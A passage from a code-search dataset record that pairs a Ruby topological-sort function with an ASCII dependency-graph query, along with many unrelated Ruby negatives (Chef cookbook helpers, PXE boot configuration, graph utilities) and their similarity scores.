\"options\" => {\n \"region\" => @config['region']\n }\n }\n }\n }\n chef_node.normal['awscli'] = awscli_region_widget\n\n if !@server.cloud.nil?\n chef_node.normal['cloudprovider'] = @server.cloud\n\n # XXX In AWS this is an OpenStruct-ish thing, but it may not be in\n # others.\n chef_node.normal[@server.cloud.to_sym] = MU.structToHash(@server.cloud_desc)\n end\n\n tags = MU::MommaCat.listStandardTags\n tags.merge!(MU::MommaCat.listOptionalTags) if @config['optional_tags']\n\n if !@config['tags'].nil?\n @config['tags'].each { |tag|\n tags[tag['key']] = tag['value']\n }\n end\n\n if @config.has_key?(\"monitor\") and !@config['monitor']\n tags['nomonitor'] = true\n end\n\n chef_node.normal['tags'] = tags\n chef_node.save\n\n # If we have a database make sure we grant access to that vault.\n # In some cases the cached getLitter response will not have all the resources in the deploy, so lets not use the cache.\n if @config.has_key?('dependencies')\n deploy = MU::MommaCat.getLitter(MU.deploy_id, use_cache: false)\n @config['dependencies'].each{ |dep|\n if dep['type'] == \"database\" && deploy.deployment.has_key?(\"databases\") && deploy.deployment[\"databases\"].has_key?(dep['name'])\n deploy.deployment[\"databases\"][dep['name']].values.each { |database|\n grantSecretAccess(database['vault_name'], database['vault_item']) if database.has_key?(\"vault_name\") && database.has_key?(\"vault_item\")\n }\n end\n }\n end\n\n # Finally, grant us access to some pre-existing Vaults.\n if !@config['vault_access'].nil?\n @config['vault_access'].each { |vault|\n grantSecretAccess(vault['vault'], vault['item'])\n }\n end\n end",
"def initialize(*args)\n super\n @action = :create\n @provider = Chef::Provider::LinodeDomainApi\nend",
"def register_tscm\n case node['platform']\n when 'redhat'\n client_id = shell_out('cat /opt/IBM/SCM/client/client.id').stdout\n\n if client_id.to_i == -1\n # registering the tscm client with server\n Chef::Log.info('Registering TSCM client........')\n\n # check for key required for server authentication\n verify_key\n\n # registering client using ssh command\n execute 'register-node' do\n command \"ssh -n -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell.exe -File 'C:/TSCM_Automation/TSCM_wrapper.ps1' #{node['tscm']['register_ot']} #{node['tscm']['node_name']} #{node['tscm']['OS_type']} #{node['tscm']['node_IP']}\"\n action :run\n timeout 1800\n end\n\n ruby_block 'sleep-after-register' do\n block do\n sleep(120)\n end\n action :run\n end\n \n else\n Chef::Log.error('TSCM Client: ' + (node['tscm']['node_name']).to_s + ' Already Registered with Object ID : ' + client_id.to_s + '.....................Nothing to do')\n node.default['tscm']['registration_status'] = 'success'\n end\n\n # registering on aix\n when 'aix'\n client_id = shell_out('cat /opt/IBM/SCM/client/client.id').stdout\n\n # check if the key is available; download in case it is not available\n verify_key\n \n Chef::Log.error(client_id.to_i)\n if client_id.to_i == -1\n Chef::Log.info('Registering the TSCM client.......')\n\n # registering the tscm client with server\n Chef::Log.info('Registering TSCM client........')\n\n execute 'register-tscm' do\n command \"ssh -n -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell.exe -File 'C:/TSCM_Automation/TSCM_wrapper.ps1' #{node['tscm']['register_ot']} #{node['tscm']['node_name']} #{node['tscm']['OS_type']} #{node['tscm']['node_IP']}\"\n action :run\n timeout 1800\n end\n\n ruby_block 'sleep-after-register' do\n block do\n sleep(120)\n end\n action :run\n end\n\n # checking log files for validating registration\n if ::File.exist?('/opt/IBM/SCM/client/client.log') && ::File.readlines('/opt/IBM/SCM/client/client.log').grep(/Storing obsfucated schedules/)\n Chef::Log.info('Registration Success...........')\n else\n Chef::Log.error('Registration Failed...........')\n end\n else\n Chef::Log.error('TSCM Client: ' + (node['tscm']['node_name']).to_s + ' Already Registered with Object ID : ' + client_id.to_s + '.....................Nothing to do')\n node.default['tscm']['registration_status'] = 'success'\n Chef::Log.error((node['tscm']['registration_status']).to_s)\n end\n end\nend",
"def render_defaults\n template '/etc/default/haproxy' do\n cookbook 'consul-haproxy'\n source 'haproxy_defaults.erb'\n mode '0644'\n action :create\n end\nend",
"def render_knife_config\n template File.join(cluster_data_dir, 'knife.rb') do\n variables lazy {\n {\n chef_server_url: chef_server_url,\n client_key: \"#{cluster_data_dir}/delivery.pem\",\n analytics_server_url: if analytics_enabled?\n \"https://#{analytics_server_fqdn}/organizations\" \\\n \"/#{node['delivery-cluster']['chef-server']['organization']}\"\n else\n ''\n end,\n supermarket_site: supermarket_enabled? ? \"https://#{supermarket_server_fqdn}\" : ''\n }\n }\n end\n end",
"def resource_class\n Chef::Resource::ChefDataBag\n end",
"def generate_solo_config\n @ssh.write \"/tmp/solo.rb\", sudo: true do |file|\n file << \"require '#{APPD_COOKBOOK_PATH}/libraries/appd-chef-formatter.rb'\"\n file << \"cookbook_path #{@cookbook_path}\"\n end\n end",
"def run_chef(use_solo=true, log_level='info', recipes=[])\n chef_bin = use_solo ? \"chef-solo\" : \"chef-client -z\"\n sudo \"bin/#{chef_bin} --log_level #{log_level} -c solo.rb -j kitchenplan-attributes.json -o #{recipes.join(\",\")}\"\n end",
"def local_cookbook(name, path=nil)\n if path\n cookbook name, path: \"#{path}/#{name}\"\n else\n cookbook name, path: \"#{ENV['CHEF_REPO']}/cookbooks/#{name}\"\n end\nend",
"def getPackageDetails(cloud_name, cookbook_name, a_comp_mirrors, a_cloud_mirrors, src_mirror, node_platform, distributionurl)\n\n #Chef::Log.info(\"Getting mirror for app: #{cookbook_name} & cloud: #{cloud_name}\")\n base_url = ''\n base_url = distributionurl if (distributionurl != nil && !distributionurl.empty?)\n\n log \"getting_couchbase_pack\" do\n message \"Getting mirror for app: #{cookbook_name}, cloud: #{cloud_name} base url: #{base_url}\"\n level :info\n end\n\n # Search for component mirror\n comp_mirrors = JSON.parse(a_comp_mirrors) if base_url.empty?\n base_url = comp_mirrors[0] if (comp_mirrors != nil && comp_mirrors.size > 0)\n # Search for cloud mirror\n cloud_mirrors = JSON.parse(a_cloud_mirrors) if base_url.empty?\n base_url = cloud_mirrors[cookbook_name] if !cloud_mirrors.nil? && cloud_mirrors.has_key?(cookbook_name)\n # Search for cookbook default attribute mirror\n base_url = src_mirror if base_url.empty?\n\n case node_platform\n # Redhat based distros\n when 'redhat', 'centos', 'fedora'\n package_type = 'rpm'\n package_installer = 'rpm -i --nodeps'\n yum_package 'perl-Time-HiRes' do\n action :install\n end\n # Debian based ditros\n when 'ubuntu', 'debian'\n package_type = 'deb'\n package_installer = 'dpkg -i'\n else\n Chef::Application.fatal!(\"#{node_platform} platform is not supported for Couchbase.\")\n end\n #Chef::Log.info(\"Mirror base_url: #{base_url} & package_type: #{package_type}\")\n log \"result_couchbase_pack\" do\n message \"Mirror base_url: #{base_url} & package_type: #{package_type}\"\n level :info\n end\n return base_url, package_type, package_installer\nend",
"def configure_ks_pxe_client(options)\n options['ip'] = single_install_ip(options)\n tftp_pxe_file = options['mac'].gsub(/:/,\"\")\n tftp_pxe_file = tftp_pxe_file.upcase\n tftp_pxe_file = \"01\"+tftp_pxe_file+\".pxelinux\"\n test_file = options['tftpdir']+\"/\"+tftp_pxe_file\n tmp_file = \"/tmp/pxecfg\"\n if File.symlink?(test_file)\n message = \"Information:\\tRemoving old PXE boot file \"+test_file\n command = \"rm #{test_file}\"\n execute_command(options,message,command)\n end\n pxelinux_file = \"pxelinux.0\"\n message = \"Information:\\tCreating PXE boot file for \"+options['name']+\" with MAC address \"+options['mac']\n command = \"cd #{options['tftpdir']} ; ln -s #{pxelinux_file} #{tftp_pxe_file}\"\n execute_command(options,message,command)\n if options['service'].to_s.match(/live/)\n iso_dir = options['tftpdir']+\"/\"+options['service']\n message = \"Information:\\tDetermining install ISO location\"\n command = \"ls #{iso_dir}/*.iso\"\n iso_file = execute_command(options,message,command) \n iso_file = iso_file.chomp\n install_iso = File.basename(iso_file)\n end\n if options['biostype'].to_s.match(/efi/)\n shim_efi_file = \"/usr/lib/shim/shimx64.efi\"\n if !File.exist?(shim_efi_file)\n install_package(options,\"shim\")\n end\n shim_grub_file = options['tftpdir']+\"/shimx64.efi\"\n net_efi_file = \"/usr/lib/grub/x86_64-efi/monolithic/grubnetx64.efi\"\n if !File.exist?(net_efi_file)\n install_package(options,\"grub-efi-amd64-bin\")\n end\n net_grub_file = options['tftpdir']+\"/grubx64.efi\"\n check_dir_exists(options,options['tftpdir'])\n check_dir_owner(options,options['tftpdir'],options['uid'])\n if !File.exist?(shim_efi_file)\n install_package(options,\"shim-signed\")\n end\n if !File.exist?(net_efi_file)\n install_package(options,\"grub-efi-amd64-signed\")\n end\n if !File.exist?(shim_grub_file)\n message = \"Information:\\tCopying #{shim_efi_file} to #{shim_grub_file}\"\n command = \"cp #{shim_efi_file} #{shim_grub_file}\"\n execute_command(options,message,command)\n check_file_owner(options,shim_grub_file,options['uid'])\n end\n if !File.exist?(net_grub_file)\n message = \"Information:\\tCopying #{net_efi_file} to #{net_grub_file}\"\n command = \"cp #{net_efi_file} #{net_grub_file}\"\n execute_command(options,message,command)\n check_file_owner(options,net_grub_file,options['uid'])\n end\n tmp_cfg_octs = options['ip'].split(\".\")\n pxe_cfg_octs = [] \n tmp_cfg_octs.each do |octet|\n hextet = octet.convert_base(10, 16)\n if hextet.length < 2\n hextet = \"0\"+hextet\n end\n pxe_cfg_octs.push(hextet.upcase) \n end\n pxe_cfg_txt = pxe_cfg_octs.join\n pxe_cfg_file = \"grub.cfg-\"+pxe_cfg_txt\n pxe_cfg_dir = options['tftpdir']+\"/grub\"\n check_dir_exists(options,pxe_cfg_dir)\n check_dir_owner(options,pxe_cfg_dir,options['uid'])\n pxe_cfg_file = pxe_cfg_dir+\"/\"+pxe_cfg_file\n else\n pxe_cfg_dir = options['tftpdir']+\"/pxelinux.cfg\"\n pxe_cfg_file = options['mac'].gsub(/:/,\"-\")\n pxe_cfg_file = \"01-\"+pxe_cfg_file\n pxe_cfg_file = pxe_cfg_file.downcase\n pxe_cfg_file = pxe_cfg_dir+\"/\"+pxe_cfg_file\n end\n if options['service'].to_s.match(/sles/)\n vmlinuz_file = \"/\"+options['service']+\"/boot/#{options['arch']}/loader/linux\"\n else\n if options['service'].to_s.match(/live/)\n vmlinuz_file = \"/\"+options['service']+\"/casper/vmlinuz\"\n else\n vmlinuz_file = \"/\"+options['service']+\"/images/pxeboot/vmlinuz\"\n end\n end\n if options['service'].to_s.match(/ubuntu/)\n if options['service'].to_s.match(/live/)\n initrd_file = \"/\"+options['service']+\"/casper/initrd\"\n else\n if options['service'].to_s.match(/x86_64/)\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/amd64/initrd.gz\"\n linux_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/amd64/linux\"\n else\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/i386/initrd.gz\"\n end\n end\n ldlinux_link = options['tftpdir']+\"/ldlinux.c32\"\n if not File.exist?(ldlinux_link) and not File.symlink?(ldlinux_link)\n ldlinux_file = options['service']+\"/images/pxeboot/netboot/ldlinux.c32\"\n message = \"Information:\\tCreating symlink for ldlinux.c32\"\n command = \"ln -s #{ldlinux_file} #{ldlinux_link}\"\n execute_command(options,message,command)\n end\n else\n if options['service'].to_s.match(/sles/)\n initrd_file = \"/\"+options['service']+\"/boot/#{options['arch']}/loader/initrd\"\n else\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/initrd.img\"\n end\n end\n if options['host-os-name'].to_s.match(/Darwin/)\n vmlinuz_file = vmlinuz_file.gsub(/^\\//,\"\")\n initrd_file = initrd_file.gsub(/^\\//,\"\")\n end\n if options['service'].to_s.match(/packer/)\n host_info = options['vmgateway']+\":\"+options['httpport']\n else\n host_info = options['hostip']\n end\n #ks_url = \"http://\"+host_info+\"/clients/\"+options['service']+\"/\"+options['name']+\"/\"+options['name']+\".cfg\"\n #autoyast_url = \"http://\"+host_info+\"/clients/\"+options['service']+\"/\"+options['name']+\"/\"+options['name']+\".xml\"\n base_url = \"http://\"+options['hostip']+\"/\"+options['name']\n if options['service'].to_s.match(/live/)\n iso_url = \"http://\"+options['hostip']+\"/\"+options['service']+\"/\"+install_iso\n end\n ks_url = \"http://\"+options['hostip']+\"/\"+options['name']+\"/\"+options['name']+\".cfg\"\n autoyast_url = \"http://\"+options['hostip']+\"/\"+options['name']+\"/\"+options['name']+\".xml\"\n install_url = \"http://\"+host_info+\"/\"+options['service']\n file = File.open(tmp_file,\"w\")\n if options['biostype'].to_s.match(/efi/)\n menuentry = \"menuentry \\\"\"+options['name']+\"\\\" {\\n\"\n file.write(menuentry)\n else\n if options['serial'] == true\n file.write(\"serial 0 115200\\n\")\n file.write(\"prompt 0\\n\")\n end\n file.write(\"DEFAULT LINUX\\n\")\n file.write(\"LABEL LINUX\\n\")\n file.write(\" KERNEL #{vmlinuz_file}\\n\")\n if options['service'].to_s.match(/live/)\n file.write(\" INITRD #{initrd_file}\\n\")\n end\n end\n if options['service'].to_s.match(/ubuntu/)\n options['ip'] = options['q_struct']['ip'].value\n install_domain = options['q_struct']['domain'].value\n install_nic = options['q_struct']['nic'].value\n options['vmgateway'] = options['q_struct']['gateway'].value\n options['netmask'] = options['q_struct']['netmask'].value\n options['vmnetwork'] = options['q_struct']['network_address'].value\n disable_dhcp = options['q_struct']['disable_dhcp'].value\n if disable_dhcp.match(/true/)\n if options['biostype'].to_s.match(/efi/)\n if options['service'].to_s.match(/live/)\n linux_file = \"/\"+options['service'].to_s+\"/casper/vmlinuz\"\n initrd_file = \"/\"+options['service'].to_s+\"/casper/initrd\"\n if options['biosdevnames'] == true\n append_string = \" linux #{linux_file} net.ifnames=0 biosdevname=0 root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n else\n append_string = \" linux #{linux_file} root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n end\n initrd_string = \" initrd #{initrd_file}\"\n else\n if options['biosdevnames'] == true\n append_string = \" linux #{linux_file} --- auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" linux #{linux_file} --- auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file}\"\n end\n initrd_string = \" initrd #{initrd_file}\"\n end\n else\n if options['service'].to_s.match(/live/)\n if options['biosdevnames'] == true\n append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/ net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n end\n else\n if options['biosdevnames'] == true\n append_string = \" APPEND auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file}\"\n end\n end\n end\n else\n append_string = \" APPEND \"\n end\n else\n if options['service'].to_s.match(/sles/)\n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} install=#{install_url} autoyast=#{autoyast_url} language=#{options['language']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} install=#{install_url} autoyast=#{autoyast_url} language=#{options['language']}\"\n end\n else\n if options['service'].to_s.match(/fedora_2[0-3]/)\n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ip=#{options['ip']} netmask=#{options['netmask']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ip=#{options['ip']} netmask=#{options['netmask']}\"\n end\n else\n if options['service'].to_s.match(/live/)\n if options['biosdevnames'] == true\n append_string = \" APPEND net.ifnames=0 biosdevname=0 root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url}\"\n else\n append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url}\"\n end\n else \n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ksdevice=bootif ip=#{options['ip']} netmask=#{options['netmask']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ksdevice=bootif ip=#{options['ip']} netmask=#{options['netmask']}\"\n end\n end\n end\n end\n end\n if options['text'] == true\n if options['service'].to_s.match(/sles/)\n append_string = append_string+\" textmode=1\"\n else\n append_string = append_string+\" text\"\n end\n end\n if options['serial'] == true\n append_string = append_string+\" serial console=ttyS0\"\n end\n append_string = append_string+\"\\n\"\n file.write(append_string)\n if options['biostype'].to_s.match(/efi/)\n initrd_string = initrd_string+\"\\n\"\n file.write(initrd_string)\n file.write(\"}\\n\")\n end\n file.flush\n file.close\n if options['biostype'].to_s.match(/efi/)\n grub_file = pxe_cfg_dir+\"/grub.cfg\"\n if File.exist?(grub_file)\n File.delete(grub_file)\n end\n FileUtils.touch(grub_file)\n grub_file = File.open(grub_file, \"w\")\n file_list = Dir.entries(pxe_cfg_dir)\n file_list.each do |file_name|\n if file_name.match(/cfg\\-/) and !file_name.match(/#{options['name'].to_s}/)\n temp_file = pxe_cfg_dir+\"/\"+file_name\n temp_array = File.readlines(temp_file)\n temp_array.each do |temp_line|\n grub_file.write(temp_line)\n end\n end\n end\n menuentry = \"menuentry \\\"\"+options['name']+\"\\\" {\\n\"\n grub_file.write(menuentry)\n grub_file.write(append_string)\n grub_file.write(initrd_string)\n grub_file.write(\"}\\n\")\n grub_file.flush\n grub_file.close\n grub_file = pxe_cfg_dir+\"/grub.cfg\"\n FileUtils.touch(grub_file)\n print_contents_of_file(options,\"\",grub_file)\n end\n message = \"Information:\\tCreating PXE configuration file \"+pxe_cfg_file\n command = \"cp #{tmp_file} #{pxe_cfg_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",pxe_cfg_file)\n return\nend",
"def chef_client\n return @chef_client unless @chef_client.nil?\n @chef_client = cluster.find_client(fullname) || false\n end",
"def chef_name\n \"#{name}_#{id}\"\n end",
"def mysql_stack\n recipe :apache_server\n recipe :passenger_gem, :passenger_configure_gem_path, :passenger_apache_module, :passenger_site\n recipe :mysql_server, :mysql_gem, :mysql_fixup_debian_start\n #recipe :mysql_database, :mysql_user # TODO: parses database.yml\n recipe :rails_rake_environment, :rails_gems, :rails_directories, :rails_bootstrap\n recipe :ntp, :time_zone, :postfix, :cron_packages, :motd, :security_updates\n end",
"def default_chef_run(&block)\n ChefSpec::ServerRunner.new do |node|\n ## allow the runner to be configured like it would normally by calling any\n ## passed in block.\n yield node unless block.nil?\n end.converge described_recipe\nend",
"def init\n clone_appd_cookbook\n chef_gem \"install berkshelf\"\n end"
] | [
"0.6365945",
"0.6294414",
"0.6217326",
"0.6217326",
"0.6217326",
"0.62059665",
"0.6134021",
"0.5994452",
"0.598766",
"0.5887639",
"0.5840201",
"0.58226264",
"0.5754595",
"0.5734258",
"0.57215744",
"0.571388",
"0.5710585",
"0.5701464",
"0.5689198",
"0.56596404",
"0.5651977",
"0.56478864",
"0.56006855",
"0.5575673",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55694294",
"0.5552146",
"0.5550597",
"0.5550597",
"0.55445474",
"0.552212",
"0.55196655",
"0.5515998",
"0.55068976",
"0.55009997",
"0.5497126",
"0.549685",
"0.549685",
"0.549685",
"0.549685",
"0.5491627",
"0.5491505",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5481323",
"0.5464451",
"0.54517853",
"0.54517853",
"0.5451419",
"0.54451007",
"0.5434836",
"0.5433184",
"0.54282707",
"0.54251474",
"0.5423148",
"0.54230106",
"0.54205084",
"0.54199696",
"0.53964174",
"0.5380254",
"0.5372802",
"0.5368101",
"0.53647816",
"0.53644013",
"0.53644013",
"0.53644013",
"0.53644013",
"0.5361758",
"0.53504497",
"0.5341039",
"0.53394246",
"0.5335116",
"0.53281474",
"0.53225464",
"0.53016245",
"0.5295022",
"0.5294768",
"0.529415",
"0.5289663",
"0.52881396",
"0.52814263",
"0.5274009",
"0.52726436",
"0.52700543",
"0.5267279",
"0.5262939",
"0.5257626",
"0.52575403",
"0.52487135",
"0.52399766",
"0.52357596"
] | 0.0 | -1 |
G => E | v F => B => A C => D | def topo_sort(dependencies) # tarjan's algorithm
dependencies.default = [] # no need for #default_proc because array never gets mutated
seen = {}
ordering = []
dependencies.keys.each do |vertex|
resolve!(vertex, dependencies, ordering, seen) unless seen[vertex]
end
ordering
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def gamma_decomposition\r\n k = 0; comparability=true; classification={}\r\n edges.map {|edge| [edge.source,edge.target]}.each do |e|\r\n if classification[e].nil?\r\n k += 1\r\n classification[e] = k; classification[e.reverse] = -k\r\n comparability &&= gratr_comparability_explore(e, k, classification)\r\n end\r\n end; [classification, comparability]\r\n end",
"def _V(data) ; end",
"def mes(v,g)\n l_succ = Set.new\n g.adjacent_vertices(v).each { |sv| l_succ << @l[sv] }\n i = 0\n i += 1 until l_succ.member?(i) == false\n @l[v] = i \n end",
"def gamma_decomposition\n k = 0; comparability=true; classification={}\n edges.map {|edge| [edge.source,edge.target]}.each do |e|\n if classification[e].nil?\n k += 1\n classification[e] = k; classification[e.reverse] = -k\n comparability &&= plexus_comparability_explore(e, k, classification)\n end\n end; [classification, comparability]\n end",
"def adj(v)\n Pazy::Enumerable::Generator.new do |yielder|\n succ(v).each &yielder.method(:yield)\n pred(v).each &yielder.method(:yield)\n end\n end",
"def do_v(s); s[:direction] = 'down'; end",
"def bothV\n [outV, inV]\n end",
"def each_edge(v)\n raise NotImplementedError\n end",
"def inversed=(_arg0); end",
"def edges_from(v)\n @from_store[v]\n end",
"def apobec3gf(seq = \"\")\n seq.tr!(\"-\", \"\")\n seq_length = seq.size\n apobec_position = []\n control_position = []\n (0..(seq_length - 3)).each do |n|\n tri_base = seq[n,3]\n if tri_base =~ /G[A|G][A|G|T]/\n apobec_position << n\n elsif seq[n] == \"G\"\n control_position << n\n end\n end\n return [apobec_position,control_position]\nend",
"def dclrG\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 9 )\n a = nil\n b = nil\n\n begin\n # at line 47:11: b= type a= ID ( '=' comp )?\n @state.following.push( TOKENS_FOLLOWING_type_IN_dclrG_392 )\n b = type\n @state.following.pop\n a = match( ID, TOKENS_FOLLOWING_ID_IN_dclrG_396 )\n # --> action\n agc_1(a,b,true,false,false,true)\n # <-- action\n # at line 47:58: ( '=' comp )?\n alt_11 = 2\n look_11_0 = @input.peek( 1 )\n\n if ( look_11_0 == EQLS )\n alt_11 = 1\n end\n case alt_11\n when 1\n # at line 47:59: '=' comp\n match( EQLS, TOKENS_FOLLOWING_EQLS_IN_dclrG_401 )\n # --> action\n agc_2('=')\n # <-- action\n @state.following.push( TOKENS_FOLLOWING_comp_IN_dclrG_406 )\n comp\n @state.following.pop\n # --> action\n agc_3('=')\n # <-- action\n\n end\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 9 )\n\n end\n \n return \n end",
"def common_face(edge2)\n end",
"def common_face(edge2)\n end",
"def g; end",
"def g; end",
"def V(*args)\n end",
"def f\n g\n end",
"def compose(g)\n\t\t\t\tlambda do |*a,&b|\n\t\t\t\t\tself.call(*g.call(*a,&b))\n\t\t\t\tend\n\t\t\tend",
"def fold f,g\n case self\n when Left then f.(get)\n when Right then g.(get)\n end\n end",
"def apobec3gf(seq = '')\n #seq.tr!(\"-\", \"\")\n seq_length = seq.size\n apobec_position = []\n control_position = []\n (0..(seq_length - 3)).each do |n|\n tri_base = seq[n,3]\n if tri_base =~ /G[A|G][A|G|T]/\n apobec_position << n\n elsif seq[n] == \"G\"\n control_position << n\n end\n end\n\n return [apobec_position,control_position]\n end",
"def |(enum); end",
"def satisfiedG(g, gi, gv)\n not nullG(g, gi, gv) and\n not terminalG(g, gi, gv) and\n pg(g, gi, gv) and\n s(g, gi, gv) and\n not f(g, gi, gv)\nend",
"def is_car(c)\n case c\n when 'v'\n [true, :down]\n when '^'\n [true, :up]\n when '>'\n [true, :right]\n when '<'\n [true, :left]\n else\n [false, nil]\n end\nend",
"def tr(p0, p1) end",
"def pa\n return VasmGrammar.new, VasmTransform.new\nend",
"def edges_to(v)\n @to_store[v]\n end",
"def x_vertex(p_hn, p_v)\n case p_v\n when :n, :s then return xp_from_hn(p_hn) + rhl\n when :ne, :se then return xp_from_hn(p_hn) + fw \n else return xp_from_hn(p_hn) \n end \n end",
"def f6; return *['a','b'] &['a','Y','Z'] end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def greibach_normal_form\n raise NotImplementedError\n end",
"def upc_e_with_composite_symbology; end",
"def g_(acc,elt)\n elt/acc\nend",
"def each_edge(v)\n raise ArgumentError, \"No such vertex\" if v < 0 or @vertices <= v\n @adjacent[v].each { |w| yield v,w }\n end",
"def transitions\n [\n {:parked => :idling, :on => :ignite},\n {:idling => :first_gear, :first_gear => :second_gear, :on => :shift_up}\n # ...\n ]\n end",
"def accept(visitor); end",
"def accept(visitor); end",
"def test_add_edge_aliases\n Automaton.new(false) do |fa|\n s0 = fa.add_state(:initial => true)\n s1 = fa.create_state\n assert_not_nil fa.add_edge(s0,s1, 'a')\n assert_not_nil fa.create_edge(s0,s1,'b')\n assert_not_nil fa.connect(s0,s1,'c')\n end\n end",
"def compose(f, g)\r\n\treturn lambda {|z| f.call(g.call(z))}\r\nend",
"def upc_a_with_composite_symbology; end",
"def inversed; end",
"def alternatives; end",
"def terminalG(g, gi, gv)\n @state[GOAL].any? {|terms| terms.size == 3 and terms[0] == g and terms[1] == gi} and (state(DROPPED, g, gi, gv) or state(ABORTED, g, gi, gv))\nend",
"def union! newFA\ns0 = new_state\ns1 = new_state\nadd_transition(s0, @start, \"\")\nadd_transition(s0, newFA.get_start, \"\")\n# reset the final states of the current object\nkeys = @final.keys\ni = 0\nwhile i < keys.size\nadd_transition(keys[i], s1, \"\")\nset_final(keys[i], false)\ni = i + 1\nend\n# set the final states of the other object\nkeys = newFA.get_final\ni = 0\nwhile i < keys.size\nadd_transition(keys[i], s1, \"\")\ni = i + 1\nend\n# copy over the states\nkeys = newFA.get_state\ni = 0\nwhile i < keys.size\nadd_state(keys[i])\ni = i + 1\nend\n# copy over the transitions\nnewFA.get_trans_hash.keys.sort.each { |v1|\nnewFA.get_trans_hash[v1].keys.sort.each { |x|\nv2 = newFA.get_transition(v1,x)\ni = 0\nwhile i < v2.size\nadd_transition(v1, v2[i], x)\ni = i + 1\nend\n}\n}\nset_start(s0)\nset_final(s1, true)\n# copy over the alphabets\nnewFA.get_alpha.each{|a|\nif @alphabet.include?(a) == false\n@alphabet.push(a)\nend\n}\nend",
"def solve(a, b, driver:\"gen\", uplo:'U')\n case driver.to_s\n when /^gen?(sv)?$/i\n # returns lu, x, ipiv, info\n Lapack.call(:gesv, a, b)[1]\n when /^(sym?|her?|pos?)(sv)?$/i\n func = driver[0..1].downcase+\"sv\"\n Lapack.call(func, a, b, uplo:uplo)[1]\n else\n raise ArgumentError, \"invalid driver: #{driver}\"\n end\n end",
"def vd(s, a, d)\n r = v(s, a)\n # NOTE: If the potential return is not of the same type,\n # we should return something appropriate (ie, the default)\n # FIXME: Throw error on class inequality?\n if r.nil || r.class != d.class\n return d\n else\n return r\n end\nend",
"def test_a_vertical_pipe_means_or\n grays = /(James|Dana|Summer) Gray/\n assert_equal 'James Gray', \"James Gray\"[grays]\n assert_equal 'Summer', \"Summer Gray\"[grays, 1]\n assert_equal nil, \"Jim Gray\"[grays, 1]\n end",
"def edge?(u,v)\n return @source[u].has_key?(v)\n end",
"def f\n self.g + self.h\n end",
"def each_vertex(&b)\n @forward_edges_with_info.each_key(&b)\n end",
